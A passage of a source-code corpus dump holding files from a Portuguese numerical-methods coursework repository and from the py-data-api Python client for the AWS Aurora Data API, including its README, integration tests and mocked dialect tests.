- 2):\n xi = a + (h * i)\n if i % 2:\n somatorio += 4 * funcao(xi)\n else:\n somatorio += 2 * funcao(xi)\n\n somatorio += funcao(a) + funcao(b)\n somatorio = somatorio * (h / 3)\n\n return somatorio\n\n\na = 0.0\nb = 1.0\nn = 300000\n# Resultado: 67/12\n\ninicio = time.time()\nprint('Trapezios', metodoTrapezio(n))\nfinal = time.time()\nprint(str(final - inicio)[:5], \"segundos.\\n\\n\")\n\ninicio = time.time()\nprint('Simpson', metodoSimpson(n))\nfinal = time.time()\nprint(str(final - inicio)[:5], \"segundos.\\n\\n\")" }, { "alpha_fraction": 0.2964285612106323, "alphanum_fraction": 0.43214285373687744, "avg_line_length": 11.17391300201416, "blob_id": "6cd5d2f0d831e9a2bec20b3737ad84cd9b6bc255", "content_id": "2503b68d247990f97d0bd987101c54dc282473c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 282, "license_type": "no_license", "max_line_length": 26, "num_lines": 23, "path": "/raizes/ponto-fixo/entrada.h", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#define EPSON 0.00001\n\ntypedef struct{\n int f;\n double x0;\n}tipoEntrada;\n\ntipoEntrada entradas[] = {\n// Função - Chute Inicial\n // 0, 0,\n // 1, 0,\n // 2, 6,\n // 3, 6,\n // 4, 6,\n // 5, 2,\n // 7, 2,\n // 8, 2,\n // 9, 50,\n // 13, 7,\n // 12, 9,\n // 11, 2,\n // 10, 2,\n};\n" }, { "alpha_fraction": 0.3925233781337738, "alphanum_fraction": 0.5091426372528076, "avg_line_length": 30.151899337768555, "blob_id": "4d23ab0dd0c3d6ec2090912c2e8980e50f16e3b0", "content_id": "21b2aedd01f472d00e5260530cf080ed96beeb77", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2478, "license_type": "no_license", "max_line_length": 77, "num_lines": 79, "path": "/raizes/bissecao/funcoes.h", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include \"entrada.h\"\n#include <iostream>\n\n#define _USE_MATH_DEFINES\n#include <cmath>\n\ntypedef struct funcao{\n int i;\n double (*funcao)(double x);\n char desc[100];\n}funcao;\n\ndouble f0(double x){ // Lista 03, Exercício 01\n return sqrt(x) - cos(x);\n}\ndouble f1(double x){ // Lista 03, Exercício 02\n return 3*(x + 1.0)*(x - 1.0/2.0)*(x - 1.0);\n}\ndouble f2(double x){ // Lista 03, Exercício 03\n return pow(x, 4.0) - 2*pow(x, 3.0) - 4*pow(x, 2.0) + 4.0*x + 4.0;\n}\ndouble f3(double x){ // Lista 03, Exercício 04\n return pow(x, 3.0) - 7*pow(x, 2.0) + 14.0*x - 6.0;\n}\ndouble f4(double x){ // Lista 03, Exercício 05, a\n return x - pow(2.0, -x);\n}\ndouble f5(double x){ // Lista 03, Exercício 05, b\n return pow(M_E, x) - pow(x, 2.0) + 3.0*x - 2.0;\n}\ndouble f6(double x){ // Lista 03, Exercício 05, c\n return 2.0*x*cos(2*x) - pow((x + 1.0), 2.0);\n}\ndouble f7(double x){ // Lista 03, Exercício 05, d\n return x*cos(x) - 2.0*pow(x, 2.0) + 3.0*x - 1.0;\n}\ndouble f8(double x){ // Lista 03, Exercício 06, a\n return 3.0*x - pow(M_E, x);\n}\ndouble f9(double x){ // Lista 03, Exercício 06, b\n return x + 3.0*cos(x) - pow(M_E, x);\n}\ndouble f10(double x){ // Lista 03, Exercício 06, c\n return pow(x, 2.0) - 4.0*x + 4.0 - log(x);\n}\ndouble f11(double x){ // Lista 03, Exercício 06, d\n return x + 1.0 - 2.0*sin(M_PI*x);\n}\ndouble f12(double x){ // Lista 03, Exercício 07\n return 2*sin(x) - x;\n}\ndouble f13(double x){ // Lista 03, Exercício 10\n return (x + 2.0)*pow((x + 1.0), 3.0)*x*pow((x - 1.0), 2.0)*(x - 2.0);\n}\ndouble f14(double x){ // Lista 03, Exercício 12\n return pow(x, 2.0) - 3;\n}\ndouble f15(double h){ // Lista 03, Exercício 19 e Prova 01, Questão 01\n return 10.0*(0.5*M_PI - asin(h) - h*pow((1.0 - h*h), 1.0/2.0)) - 12.4;\n}\n\nfuncao funcoes[] = {\n 0, f0, \"f(x) = sqrt(x) - cos(x)\",\n 1, f1, \"f(x) = 3(x + 1)(x - 1/2)(x - 1)\",\n 2, f2, \"f(x) = x^4 - 2x^3 - 4x^2 + 4x + 4\",\n 3, f3, \"f(x) = x^3 - 7x^2 + 14x - 6\",\n 4, f4, \"f(x) = x - x^-2\",\n 5, f5, \"f(x) = e^x - x^2 + 3x - 2\",\n 6, f6, \"f(x) = 2xcos(2x) - (x + 1)^2\",\n 7, f7, \"f(x) = xcos(x) - 2x^2 - 3x - 1\",\n 8, f8, \"f(x) = 3x - e^x\",\n 9, f9, \"f(x) = x + 3cos(x) - e^x\",\n 10, f10, \"f(x) = x^2 - 4x + 4 - ln(x)\",\n 11, f11, \"f(x) = x + 1 - 2sen(PIx)\",\n 12, f12, \"p(x) = 2sen(x) - x\",\n 13, f13, \"f(x) = (x+2)(x+1)^3*x(x-1)^2(x-2)\",\n 14, f14, \"f(x) = x^2 - 3\",\n 15, f15, \"f(h) = L * ((0.5 * PI) - arcsin(h) - h * (1 - h^2)^(1/2)) - V\",\n};\n" }, { "alpha_fraction": 0.43800124526023865, "alphanum_fraction": 0.45280691981315613, "avg_line_length": 29, "blob_id": "6160d19d83eb4cd3e4d6729f71fe99bc4591c7f3", "content_id": "b7e3efc07c6fa7bd8e1cb9be87f65187c071fa44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1626, "license_type": "no_license", "max_line_length": 96, "num_lines": 54, "path": "/interpolacao-newton/bruno.py", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "print(\"------- Interpoção Polinomial (Método de Newton) -------\")\nn = eval(input(\"Digite o grau do polinômio a ser avaliado: \"))+1\n\nmatriz = [0.0] * n\nfor i in range(n):\n matriz[i] = [0.0] * n\n\nvetor = [0.0] * n\n\nprint(matriz)\nprint(vetor)\nfor i in range(n):\n x = eval(input(\"Preencha o valor de x: \"))\n y = eval(input(\"Preencha o valor de f({}): \".format(x)))\n vetor[i]=float(x)\n matriz[i][0]=float(y)\n\nprint(vetor) \nprint(matriz)\n\nponto_a_avaliar = eval(input(\"Preencha o ponto a avaliar: \"))\n\nprint(\"------------------------------\")\nprint(\"------- Calculando ... -------\")\nprint(\"------------------------------\")\n\nfor i in range(1,n):\n for j in range(i,n):\n print(\"i=\",i,\" j=\",j)\n print(\"(\",matriz[j][i-1],\"-\",matriz[j-1][i-1],\")/(\",vetor[j],\"-\",vetor[j-i],\")\")\n matriz[j][i] = ( (matriz[j][i-1]-matriz[j-1][i-1]) / (vetor[j]-vetor[j-i]))\n print(\"matriz[\",j,\"][\",i,\"] = \",(matriz[j][i-1]-matriz[j-1][i-1])/(vetor[j]-vetor[j-i]))\n\nprint(\"------------------------------\")\nprint(\"------------------------------\")\nfor i in range(n):\n print(matriz[i])\nprint(\"------------------------------\")\nprint(\"------------------------------\")\n\naprx = 0\nmul = 1.0\nfor i in range(n):\n print(\"matriz[\",i,\"][\",i,\"]\",\"=\",matriz[i][i])\n mul = matriz[i][i];\n print(\"mul antes do ciclo j=\",mul)\n for j in range(1,i+1):\n mul = mul * (ponto_a_avaliar - vetor[j-1])\n print(\"mul no ciclo j=\",mul)\n aprx = aprx + mul\n\nprint(\"------------------------------\")\nprint(\"------------------------------\")\nprint(\"O valor aproximado de f(\",ponto_a_avaliar,\") é: \", aprx)\n\n" }, { "alpha_fraction": 0.5778894424438477, "alphanum_fraction": 0.5879396796226501, "avg_line_length": 24.95652198791504, "blob_id": "25238584308a80f4cd2334984fe914560e085e9d", "content_id": "8f902de86141d5b33441aed7d1a0fa8956018e13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 597, "license_type": "no_license", "max_line_length": 56, "num_lines": 23, "path": "/raizes/bissecao/main.cpp", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include \"bissecao.h\"\n\nusing namespace std;\n\nvoid imprimir(tipoEntrada i, bissecao j){\n retorno ret = j.metodo(i.a, i.b, funcoes[i.f].funcao);\n\n printf(\"Funcao %d: (%s)\\n\", i.f, funcoes[i.f].desc);\n printf(\"Metodo: %s)\\n\", j.desc);\n printf(\"Intervalo: [%.3lf, %.3lf]\\n\", i.a, i.b);\n printf(\"Iteracoes: %d\\n\", ret.iteracoes);\n printf(\"x = %.8lf\\n\", ret.y);\n printf(\"f(x) = %.8lf\\n\", funcoes[i.f].funcao(ret.y));\n printf(\"Erro = %.8lf\\n\\n\", ret.erro);\n}\n\nint main(int argc, char const *argv[]) {\n for (auto &i: entradas)\n for (auto &j: bissecoes)\n imprimir(i, j);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.27950310707092285, "alphanum_fraction": 0.3788819909095764, "avg_line_length": 14.682927131652832, "blob_id": "5bf3e0f7aef8933776b70302449da85a020e5277", "content_id": "cb1d2a683a9b9849b3c9a75f8d377a446740a35d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 644, "license_type": "no_license", "max_line_length": 39, "num_lines": 41, "path": "/minimos-quadrados/PythonApplication2/minimos-quadrados.py", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": " entrada = [(0, 0.01),\n (1, 1.01),\n (2, 1.40),\n (3, 3.81),\n (4, 4.01),\n (5, 4.55),\n (6, 4.20)]\n\naproximacoes = []\n\n#entrada = [(0.128, -20),\n# (0.134, 10),\n# (0.144, 70)]\n\nX = 7\n\nx = 0\nx2 = 0\nxy = 0\ny = 0\n\nn = len(entrada)\n\nfor i in range(n):\n x += entrada[i][0]\n x2 += entrada[i][0] ** 2\n xy += entrada[i][0] * entrada[i][1]\n y += entrada[i][1]\n\na = ((n * xy - x * y )/\n (n * x2 - x ** 2))\n\nb = ((x2 * y - x * xy)/\n (n * x2 - x ** 2))\n\n\nfor i in range(n):\n aproximacaoes[i] = (a * i) + b\n\nprint(aproximacao)\nprint(aproximacoes)\n" }, { "alpha_fraction": 0.5777027010917664, "alphanum_fraction": 0.5945945978164673, "avg_line_length": 17.5, "blob_id": "f5ba9fb3917658a06452e7fe735d3daa1366423b", "content_id": "465035d06af53514bd00ef90cb4346ca86239bac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 296, "license_type": "no_license", "max_line_length": 65, "num_lines": 16, "path": "/raizes/ponto-fixo/ponto-fixo.h", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include \"funcoes.h\"\n#include \"../comum.h\"\n\nretorno executar(double x, int f){\n retorno ret;\n\n for (ret.iteracoes = 0; ret.iteracoes < 1000; ret.iteracoes++){\n ret.y = funcoes[f].funcao(x);\n\n ret.erro = erro(ret.y, x);\n if (ret.erro < EPSON) break;\n\n x = ret.y;\n }\n return ret;\n}\n" } ]
22
acute0203/py-data-api
https://github.com/acute0203/py-data-api
8bd6e91908c195848b7f46a9336fccb4a8c36a3b
199769b9584d4e9dd48a98696f35e2435880a34f
881e2af88ae14cae1e040e05b130bb3587ee4317
refs/heads/master
2020-09-06T13:30:25.017576
2019-11-08T10:00:23
2019-11-08T10:00:23
220,437,676
1
0
MIT
2019-11-08T09:55:47
2019-11-05T14:05:12
2019-11-08T05:47:42
null
[ { "alpha_fraction": 0.5685092210769653, "alphanum_fraction": 0.5842546224594116, "avg_line_length": 28.554454803466797, "blob_id": "27356068369358f0e4bb83306b99369f10b976ea", "content_id": "1244fd4c3de8dd8af342cc0c3c10f654192fc2f3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5970, "license_type": "permissive", "max_line_length": 91, "num_lines": 202, "path": "/tests/integration/test_mysql.py", "repo_name": "acute0203/py-data-api", "src_encoding": "UTF-8", "text": "import time\nfrom typing import List\n\nimport boto3\nimport pytest\nfrom pydataapi import DataAPI, Result, transaction\nfrom pydataapi.pydataapi import Record\nfrom sqlalchemy import Column, Integer, String, create_engine\nfrom sqlalchemy.engine import Connection\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import Query\nfrom sqlalchemy.sql import Insert\n\npytest_plugins = [\"docker_compose\"]\n\n\nclass Pets(declarative_base()):\n __tablename__ = 'pets'\n id = Column(Integer, primary_key=True, autoincrement=True)\n name = Column(String(255, collation='utf8_unicode_ci'), default=None)\n\n\ndatabase: str = 'test'\nresource_arn: str = 'arn:aws:rds:us-east-1:123456789012:cluster:dummy'\nsecret_arn: str = 'arn:aws:secretsmanager:us-east-1:123456789012:secret:dummy'\n\n\ndef get_connection() -> Connection:\n return create_engine(\n 'mysql+pymysql://root:[email protected]:3306/test?charset=utf8mb4'\n ).connect()\n\n\[email protected](scope='module')\ndef db_connection(module_scoped_container_getter) -> Connection:\n retries = 60\n while True:\n try:\n connection = get_connection()\n try:\n yield connection\n finally:\n if not connection.closed:\n connection.close()\n break\n except Exception as e:\n print(str(e))\n if retries > 0:\n retries -= 1\n time.sleep(1)\n continue\n raise\n\n\[email protected]()\ndef create_table(db_connection) -> None:\n db_connection.execute('drop table if exists pets;')\n db_connection.execute(\n 'create table pets (id int auto_increment not null primary key, name varchar(10));'\n )\n\n\[email protected]()\ndef rds_data_client(db_connection, create_table):\n return boto3.client(\n 'rds-data',\n endpoint_url='http://127.0.0.1:8080',\n aws_access_key_id='aaa',\n aws_secret_access_key='bbb',\n )\n\n\ndef test_simple_execute(rds_data_client):\n data_api = DataAPI(\n resource_arn=resource_arn,\n secret_arn=secret_arn,\n database=database,\n client=rds_data_client,\n )\n result: Result = data_api.execute('show tables')\n assert len(result.one()) == 1\n assert result.one()[0] == 'pets'\n\n\ndef test_decorator(rds_data_client, db_connection):\n @transaction(\n database=database,\n resource_arn=resource_arn,\n secret_arn=secret_arn,\n client=rds_data_client,\n )\n def add_pet(data_api: DataAPI, pet_names: List[str]) -> None:\n response = data_api.execute(Insert(Pets, {'name': pet_names[0]}))\n assert response.generated_fields_first == 1\n response = data_api.execute(Insert(Pets, {'name': pet_names[1]}))\n assert response.generated_fields_first == 2\n\n pet_names: List[str] = ['dog', 'cat']\n add_pet(pet_names)\n result = list(db_connection.execute('select * from pets'))\n assert result[0][1] == 'dog'\n assert result[1][1] == 'cat'\n\n\ndef test_with_statement(rds_data_client, db_connection):\n with DataAPI(\n database=database,\n resource_arn=resource_arn,\n secret_arn=secret_arn,\n client=rds_data_client,\n ) as data_api:\n insert: Insert = Insert(Pets, {'name': 'dog'})\n\n result = data_api.execute(insert)\n assert result.number_of_records_updated == 1\n\n query = Query(Pets).filter(Pets.id == 1)\n result = data_api.execute(query)\n\n assert list(result) == [Record([1, 'dog'], [])]\n\n result = data_api.execute('select * from pets')\n assert result.one().dict() == {'id': 1, 'name': 'dog'}\n\n insert: Insert = Insert(Pets)\n data_api.batch_execute(\n insert,\n [\n {'id': 2, 'name': 'cat'},\n {'id': 3, 'name': 'snake'},\n {'id': 4, 'name': 'rabbit'},\n ],\n )\n\n result = data_api.execute('select * from pets')\n expected = [\n Record([1, 'dog'], ['id', 'name']),\n Record([2, 'cat'], ['id', 'name']),\n Record([3, 'snake'], ['id', 'name']),\n Record([4, 'rabbit'], ['id', 'name']),\n ]\n assert list(result) == expected\n\n for row, expected_row in zip(result, expected):\n assert row == expected_row\n\n\ndef test_rollback(rds_data_client, db_connection):\n try:\n with DataAPI(resource_arn=resource_arn, secret_arn=secret_arn) as data_api:\n data_api.execute(Insert(Pets, {'name': 'dog'}))\n # you can rollback by Exception\n raise Exception\n except:\n pass\n result = list(db_connection.execute('select * from pets'))\n assert result == []\n\n\ndef test_rollback_with_custom_exception(db_connection):\n rds_data_client = boto3.client(\n 'rds-data',\n endpoint_url='http://127.0.0.1:8080',\n aws_access_key_id='aaa',\n aws_secret_access_key='bbb',\n )\n\n class OriginalError(Exception):\n pass\n\n class OtherError(Exception):\n pass\n\n try:\n with DataAPI(\n resource_arn=resource_arn,\n secret_arn=secret_arn,\n rollback_exception=OriginalError,\n database=database,\n client=rds_data_client,\n ) as data_api:\n data_api.execute(Insert(Pets, {'name': 'dog'}))\n raise OriginalError # rollback\n except:\n pass\n result = list(db_connection.execute('select * from pets'))\n assert result == []\n\n try:\n with DataAPI(\n resource_arn=resource_arn,\n secret_arn=secret_arn,\n rollback_exception=OriginalError,\n database=database,\n client=rds_data_client,\n ) as data_api:\n data_api.execute(Insert(Pets, {'name': 'dog'}))\n raise OtherError\n except:\n pass\n result = list(get_connection().execute('select * from pets'))\n assert result == [(2, 'dog')]\n" }, { "alpha_fraction": 0.6444725394248962, "alphanum_fraction": 0.6590226292610168, "avg_line_length": 29.995098114013672, "blob_id": "fac4bf048be7e816189d760edaf163d97ec2771e", "content_id": "2c9cfa4ce8c42c4473e7064467bc814d83585cf6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6323, "license_type": "permissive", "max_line_length": 130, "num_lines": 204, "path": "/README.md", "repo_name": "acute0203/py-data-api", "src_encoding": "UTF-8", "text": "# py-data-api - Data API Client for Python\n\n[![Build Status](https://travis-ci.org/koxudaxi/py-data-api.svg?branch=master)](https://travis-ci.org/koxudaxi/py-data-api)\n[![PyPI version](https://badge.fury.io/py/pydataapi.svg)](https://badge.fury.io/py/pydataapi)\n[![PyPI - Python Version](https://img.shields.io/pypi/pyversions/pydataapi)](https://pypi.python.org/pypi/pydataapi)\n[![codecov](https://codecov.io/gh/koxudaxi/py-data-api/branch/master/graph/badge.svg)](https://codecov.io/gh/koxudaxi/py-data-api)\n![license](https://img.shields.io/github/license/koxudaxi/py-data-api.svg)\n\npy-data-api is a user-friendly client which supports SQLAlchemy models.\nAlso, the package includes DB API 2.0 Client and SQLAlchemy Dialects.\n\n## Features\n- A user-friendly client which supports SQLAlchemy models\n- SQLAlchemy Dialects (experimental)\n- DB API 2.0 compatible client [PEP 249](https://www.python.org/dev/peps/pep-0249/)\n\n## What's AWS Aurora Serverless's Data API?\nhttps://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/data-api.html\n\n## This project is an experimental phase.\nWarning: Some interface will be changed.\n\n## How to install\npydataapi requires Python 3.6.1 or later \n```bash\n$ pip install pydataapi\n```\n\n## Example\n\n```python\nfrom typing import List\n\nfrom sqlalchemy import Column, Integer, String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import Query\nfrom sqlalchemy.sql import Insert\n\nfrom pydataapi import DataAPI, transaction, Result, Record\n\n\nclass Pets(declarative_base()):\n __tablename__ = 'pets'\n id = Column(Integer, primary_key=True, autoincrement=True)\n name = Column(String(255, collation='utf8_unicode_ci'), default=None)\n\n\ndatabase: str = 'test'\nresource_arn: str = 'arn:aws:rds:us-east-1:123456789012:cluster:serverless-test-1'\nsecret_arn: str = 'arn:aws:secretsmanager:us-east-1:123456789012:secret:serverless-test1'\n\n\ndef example_with_statement():\n # DataAPI supports with statement for handling transaction\n with DataAPI(database=database, resource_arn=resource_arn, secret_arn=secret_arn) as data_api:\n\n # start transaction\n\n insert: Insert = Insert(Pets, {'name': 'dog'})\n # INSERT INTO pets (name) VALUES ('dog')\n\n # `execute` accepts SQL statement as str or SQL Alchemy SQL objects\n result: Result = data_api.execute(insert)\n print(result.number_of_records_updated)\n # 1\n\n query = Query(Pets).filter(Pets.id == 1)\n result: Result = data_api.execute(query) # or data_api.execute('select id, name from pets')\n # SELECT pets.id, pets.name FROM pets WHERE pets.id = 1\n\n # `Result` like a Result object in SQL Alchemy\n print(result.scalar())\n # 1\n\n print(result.one())\n # [Record<id=1, name='dog'>]\n \n # `Result` is Sequence[Record]\n records: List[Record] = list(result)\n print(records)\n # [Record<id=1, name='dog'>]\n\n # Record is Sequence and Iterator\n record = records[0]\n print(record[0])\n # 1\n print(record[1])\n # dog\n\n for column in record:\n print(column)\n # 1 ...\n\n # show record as dict()\n print(record.dict())\n # {'id': 1, 'name': 'dog'}\n\n # batch insert\n insert: Insert = Insert(Pets)\n data_api.batch_execute(insert, [\n {'id': 2, 'name': 'cat'},\n {'id': 3, 'name': 'snake'},\n {'id': 4, 'name': 'rabbit'},\n ])\n\n result = data_api.execute('select * from pets')\n print(list(result))\n # [Record<id=1, name='dog'>, Record<id=2, name='cat'>, Record<id=3, name='snake'>, Record<id=4, name='rabbit'>]\n\n # result is a sequence object\n for record in result:\n print(record)\n # Record<id=1, name='dog'> ...\n\n # commit\n\n\ndef example_decorator():\n pet_names: List[str] = ['dog', 'cat', 'snake']\n add_pets(pet_names)\n\n\n@transaction(database=database, resource_arn=resource_arn, secret_arn=secret_arn)\ndef add_pets(data_api: DataAPI, pet_names: List[str]) -> None:\n # start transaction\n for pet_name in pet_names:\n data_api.execute(Insert(Pets, {'name': pet_name}))\n # some logic ...\n\n # commit\n\n\ndef example_simple_execute():\n data_api = DataAPI(resource_arn=resource_arn, secret_arn=secret_arn, database=database)\n result: Result = data_api.execute('show tables')\n print(result.scalar())\n # Pets\n\n\ndef example_rollback():\n with DataAPI(resource_arn=resource_arn, secret_arn=secret_arn) as data_api:\n data_api.execute(Insert(Pets, {'name': 'dog'}))\n # you can rollback by Exception\n raise Exception\n\n\ndef example_rollback_with_custom_exception():\n class OriginalError(Exception):\n pass\n\n with DataAPI(resource_arn=resource_arn, secret_arn=secret_arn, rollback_exception=OriginalError) as data_api:\n\n data_api.execute(Insert(Pets, {'name': 'dog'}))\n # some logic ...\n\n # rollback when happen `rollback_exception`\n raise OriginalError # rollback\n\n # raise Exception <- DataAPI don't rollback\n\ndef example_driver_for_sqlalchemy():\n from sqlalchemy.engine import create_engine\n engine = create_engine(\n 'mysql+pydataapi://',\n connect_args={\n 'resource_arn': 'arn:aws:rds:us-east-1:123456789012:cluster:dummy',\n 'secret_arn': 'arn:aws:secretsmanager:us-east-1:123456789012:secret:dummy',\n 'database': 'test'}\n )\n\n result: ResultProxy = engine.execute(\"select * from pets\")\n print(result.fetchall())\n\n```\n\n## Contributing to pydataapi\nWe are waiting for your contributions to `pydataapi`.\n\n### How to contribute\n[https://koxudaxi.github.io/py-data-api/contributing](https://koxudaxi.github.io/py-data-api/contributing)\n\n\n## Related projects\n### local-data-api\n\nDataAPI Server for local \n\nhttps://github.com/koxudaxi/local-data-api\n\n## PyPi \n\n[https://pypi.org/project/pydataapi](https://pypi.org/project/pydataapi)\n\n## Source Code\n\n[https://github.com/koxudaxi/py-data-api](https://github.com/koxudaxi/py-data-api)\n\n## Documentation\n\n[https://koxudaxi.github.io/py-data-api](https://koxudaxi.github.io/py-data-api)\n\n## License\n\npy-data-api is released under the MIT License. http://www.opensource.org/licenses/mit-license\n" }, { "alpha_fraction": 0.7256097793579102, "alphanum_fraction": 0.7439024448394775, "avg_line_length": 31.799999237060547, "blob_id": "1d01a9568f9ade13f2802e9b4e112d7f0adeae11", "content_id": "71a772dc71d29063aaee69189871d21e7d7c6311", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 164, "license_type": "permissive", "max_line_length": 85, "num_lines": 5, "path": "/scripts/format.sh", "repo_name": "acute0203/py-data-api", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\nset -e\n\nblack pydataapi tests --skip-string-normalization\nisort --recursive -w 88 --combine-as --thirdparty pydataapi pydataapi tests -m 3 -tc\n" }, { "alpha_fraction": 0.34559985995292664, "alphanum_fraction": 0.3635644316673279, "avg_line_length": 33.80991744995117, "blob_id": "bec7d4799422fc54f9dd4b2d1a1d003f7ae683c8", "content_id": "015a60e878aea2db8da9e7fac6284dc529e3858f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12636, "license_type": "permissive", "max_line_length": 126, "num_lines": 363, "path": "/tests/pydataapi/test_dialect.py", "repo_name": "acute0203/py-data-api", "src_encoding": "UTF-8", "text": "import pytest\nfrom sqlalchemy.engine import ResultProxy\n\n\[email protected]\ndef mocked_client(mocker):\n return mocker.patch('boto3.client')\n\n\ndef test_mysql(mocked_client) -> None:\n from sqlalchemy.engine import create_engine\n\n mocked_client.begin_transaction.return_value = {'transactionId': 'abc'}\n mocked_client.execute_statement.side_effect = [\n {\n 'columnMetadata': [\n {\n 'arrayBaseColumnType': 0,\n 'isAutoIncrement': False,\n 'isCaseSensitive': False,\n 'isCurrency': False,\n 'isSigned': True,\n 'label': 'Variable_name',\n 'name': 'VARIABLE_NAME',\n 'nullable': 0,\n 'precision': 256,\n 'scale': 0,\n 'tableName': 'VARIABLES',\n 'type': 12,\n 'typeName': 'VARCHAR',\n },\n {\n 'arrayBaseColumnType': 0,\n 'isAutoIncrement': False,\n 'isCaseSensitive': False,\n 'isCurrency': False,\n 'isSigned': True,\n 'label': 'Value',\n 'name': 'VARIABLE_VALUE',\n 'nullable': 1,\n 'precision': 4096,\n 'scale': 0,\n 'tableName': 'VARIABLES',\n 'type': 12,\n 'typeName': 'VARCHAR',\n },\n ],\n 'numberOfRecordsUpdated': 0,\n 'records': [\n [\n {'stringValue': 'sql_mode'},\n {\n 'stringValue': 'IGNORE_SPACE,STRICT_TRANS_TABLES,NO_ENGINE_SUBSTITUTION'\n },\n ]\n ],\n },\n {\n 'columnMetadata': [\n {\n 'arrayBaseColumnType': 0,\n 'isAutoIncrement': False,\n 'isCaseSensitive': False,\n 'isCurrency': False,\n 'isSigned': True,\n 'label': 'Variable_name',\n 'name': 'VARIABLE_NAME',\n 'nullable': 0,\n 'precision': 256,\n 'scale': 0,\n 'tableName': 'VARIABLES',\n 'type': 12,\n 'typeName': 'VARCHAR',\n },\n {\n 'arrayBaseColumnType': 0,\n 'isAutoIncrement': False,\n 'isCaseSensitive': False,\n 'isCurrency': False,\n 'isSigned': True,\n 'label': 'Value',\n 'name': 'VARIABLE_VALUE',\n 'nullable': 1,\n 'precision': 4096,\n 'scale': 0,\n 'tableName': 'VARIABLES',\n 'type': 12,\n 'typeName': 'VARCHAR',\n },\n ],\n 'numberOfRecordsUpdated': 0,\n 'records': [\n [{'stringValue': 'lower_case_table_names'}, {'stringValue': '0'}]\n ],\n },\n {\n 'columnMetadata': [\n {\n 'arrayBaseColumnType': 0,\n 'isAutoIncrement': False,\n 'isCaseSensitive': False,\n 'isCurrency': False,\n 'isSigned': True,\n 'label': 'VERSION()',\n 'name': 'VERSION()',\n 'nullable': 0,\n 'precision': 24,\n 'scale': 31,\n 'tableName': '',\n 'type': 12,\n 'typeName': 'VARCHAR',\n }\n ],\n 'numberOfRecordsUpdated': 0,\n 'records': [[{'stringValue': '5.6.45'}]],\n },\n {\n 'columnMetadata': [\n {\n 'arrayBaseColumnType': 0,\n 'isAutoIncrement': False,\n 'isCaseSensitive': False,\n 'isCurrency': False,\n 'isSigned': True,\n 'label': 'DATABASE()',\n 'name': 'DATABASE()',\n 'nullable': 1,\n 'precision': 136,\n 'scale': 31,\n 'tableName': '',\n 'type': 12,\n 'typeName': 'VARCHAR',\n }\n ],\n 'numberOfRecordsUpdated': 0,\n 'records': [[{'stringValue': 'test'}]],\n },\n {\n 'columnMetadata': [\n {\n 'arrayBaseColumnType': 0,\n 'isAutoIncrement': False,\n 'isCaseSensitive': False,\n 'isCurrency': False,\n 'isSigned': True,\n 'label': '@@tx_isolation',\n 'name': '@@tx_isolation',\n 'nullable': 1,\n 'precision': 60,\n 'scale': 31,\n 'tableName': '',\n 'type': 12,\n 'typeName': 'VARCHAR',\n }\n ],\n 'numberOfRecordsUpdated': 0,\n 'records': [[{'stringValue': 'REPEATABLE-READ'}]],\n },\n {'records': [[{'stringValue': 'test plain returns'}]]},\n {'records': [[{'stringValue': 'test unicode returns'}]]},\n {\n 'numberOfRecordsUpdated': 0,\n 'records': [[{'longValue': 1}, {'stringValue': 'cat'}]],\n \"columnMetadata\": [\n {\n \"arrayBaseColumnType\": 0,\n \"isAutoIncrement\": False,\n \"isCaseSensitive\": False,\n \"isCurrency\": False,\n \"isSigned\": True,\n \"label\": \"id\",\n \"name\": \"id\",\n \"nullable\": 1,\n \"precision\": 11,\n \"scale\": 0,\n \"schemaName\": \"\",\n \"tableName\": \"users\",\n \"type\": 4,\n \"typeName\": \"INT\",\n },\n {\n \"arrayBaseColumnType\": 0,\n \"isAutoIncrement\": False,\n \"isCaseSensitive\": False,\n \"isCurrency\": False,\n \"isSigned\": False,\n \"label\": \"name\",\n \"name\": \"name\",\n \"nullable\": 1,\n \"precision\": 255,\n \"scale\": 0,\n \"schemaName\": \"\",\n \"tableName\": \"users\",\n \"type\": 12,\n \"typeName\": \"VARCHAR\",\n },\n ],\n },\n ]\n engine = create_engine(\n 'mysql+pydataapi://',\n echo=True,\n connect_args={\n 'resource_arn': 'arn:aws:rds:us-east-1:123456789012:cluster:dummy',\n 'secret_arn': 'arn:aws:secretsmanager:us-east-1:123456789012:secret:dummy',\n 'database': 'test',\n 'client': mocked_client,\n },\n )\n\n result: ResultProxy = engine.execute(\"select * from pets\")\n assert result.fetchall() == [(1, 'cat')]\n\n\ndef test_postgresql(mocked_client) -> None:\n from sqlalchemy.engine import create_engine\n\n mocked_client.begin_transaction.return_value = {'transactionId': 'abc'}\n\n mocked_client.execute_statement.side_effect = [\n {\n 'records': [\n [\n {\n 'stringValue': 'PostgreSQL 10.7 on x86_64-pc-linux-musl, compiled by gcc (Alpine 8.3.0) 8.3.0, 64-bit'\n }\n ]\n ],\n \"columnMetadata\": [\n {\n \"arrayBaseColumnType\": 0,\n \"isAutoIncrement\": False,\n \"isCaseSensitive\": False,\n \"isCurrency\": False,\n \"isSigned\": False,\n \"label\": 